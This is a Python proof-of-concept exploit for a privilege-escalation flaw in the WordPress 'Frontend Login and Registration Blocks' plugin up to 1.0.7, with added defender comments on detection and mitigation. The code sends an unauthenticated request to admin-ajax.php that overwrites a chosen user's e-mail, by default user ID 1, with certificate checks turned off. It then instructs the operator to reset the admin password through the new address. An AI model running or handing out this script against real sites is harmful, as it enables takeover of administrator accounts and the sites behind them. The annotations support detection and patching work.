# Proof-of-concept for the issue named in the argparse description below:
# "Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to
# Privilege Escalation".
#
# What the script does, as far as this file shows: it sends one POST to
# <url>/wp-admin/admin-ajax.php carrying an AJAX action name, a user ID and a
# replacement e-mail address. The session carries no cookies, nonce or
# credentials, so the request goes out unauthenticated.
# NOTE(review): the plugin's handler is not visible here; presumably it updates
# the e-mail of the supplied user_id without an authorization check. Confirm
# against the plugin source.
#
# Defender notes:
#   * Detection: web/WAF logs showing POSTs to /wp-admin/admin-ajax.php with
#     action=flrblocksusersettingsupdatehandle, especially when user_id does not
#     belong to the requesting session or no auth cookie is present. Correlate
#     with account e-mail changes followed by a password-reset request.
#   * The User-Agent set by this script ends with a literal author tag (see
#     get_user_agent); it is an indicator for unmodified copies only.
#   * Mitigation: move off plugin versions <= 1.0.7 (the fixed release is not
#     named on this page; check the vendor advisory), and audit recent e-mail
#     changes on administrator accounts.
import requests
import argparse
import sys
#By: Khaled Alenazi (Nxploited)


def print_banner():
    """Print the author's banner.

    The listing this was recovered from had its line breaks collapsed, so the
    art is kept as the single space-separated string that appears on the page.
    """
    print(
        " @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@@ "
        "@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@ "
        "!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ !@@ @@! @@@@ !@@ "
        "!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! !@! @!@!@ !@! "
        "!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@@!@! @!@ @! !@! !!@@!! "
        "!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! @!!@!!!! !@!!! !!! @!!@!!! "
        ":!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:! "
        ":!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! :!: !:! !:! "
        "::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :::: ::: ::::::: :: :::: :: "
        ":: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : : : : : : :: : : "
        "By: Khaled Alenazi (Nxploited) "
    )


def disable_ssl():
    """Silence urllib3 warnings (certificate checks are turned off in create_session)."""
    requests.packages.urllib3.disable_warnings()


def create_session():
    """Return a requests.Session with TLS verification off and a fixed User-Agent.

    verify=False means the server certificate is never validated, so the
    response cannot be trusted to come from the intended host.
    """
    http = requests.Session()
    http.verify = False
    http.headers['User-Agent'] = get_user_agent()
    return http


def get_user_agent():
    """Return the User-Agent header value sent with the request.

    The author tag after '#' is inside the string literal, so it is transmitted
    on the wire and will appear verbatim in access logs.
    """
    browser_part = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    author_tag = " # By: Khaled Alenazi (Nxploited)"
    return browser_part + author_tag


def parse_arguments():
    """Parse --url (required), --user_id (default "1") and --mail from the command line."""
    cli = argparse.ArgumentParser(
        description="Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation"
    )
    cli.add_argument(
        "--url", "-u",
        required=True,
        help="Target URL, e.g., http://192.168.100.74:888/wordpress",
    )
    cli.add_argument(
        "--user_id", "-id",
        default="1",
        help="User ID to target (default: 1)",
    )
    cli.add_argument(
        "--mail", "-mail",
        default="example@gmail.com",
        help="Email to set (default: example@gmail.com)",
    )
    return cli.parse_args()


def build_payload(user_id, email):
    """Return the form fields for the AJAX request.

    These three field names are what a log or WAF rule would match on.
    """
    return {
        'action': 'flrblocksusersettingsupdatehandle',
        'user_id': user_id,
        'flr-blocks-email-update': email,
    }


def send_exploit(session, url, payload):
    """POST *payload* to <url>/wp-admin/admin-ajax.php and return the response.

    Any exception is printed and the process exits with status 1.
    NOTE(review): no timeout is passed, so an unresponsive host blocks forever;
    a url ending in '/' produces a double slash in the request path.
    """
    try:
        endpoint = url + "/wp-admin/admin-ajax.php"
        return session.post(endpoint, data=payload)
    except Exception as err:
        print(f"Error sending request: {err}")
        sys.exit(1)


def handle_response(response):
    """Print a verdict based on the HTTP status and response body.

    NOTE(review): "success" here only means HTTP 200 with a body other than
    "0". WordPress answers "0" when no AJAX handler ran, but any other 200 body
    (an error page, a WAF block page) is also reported as success, so the
    output is not proof that the e-mail was changed.
    """
    if response.status_code != 200:
        print(f"Exploit failed. HTTP Status: {response.status_code}")
        print(f"Response: {response.text}")
        return

    if response.text.strip() == "0":
        print("Exploit failed. Server responded with '0' — likely rejected request or missing parameters.")
        return

    print(f"Exploit successful! Response: {response.text}")
    print("Final Step: Go to the Forgot Password page and reset the admin password using the new email!")


def main():
    """Run the steps in order: banner, warning suppression, argument parsing, request, verdict."""
    print_banner()
    disable_ssl()
    options = parse_arguments()
    http = create_session()
    form_fields = build_payload(options.user_id, options.mail)
    reply = send_exploit(http, options.url, form_fields)
    handle_response(reply)


if __name__ == "__main__":
    main()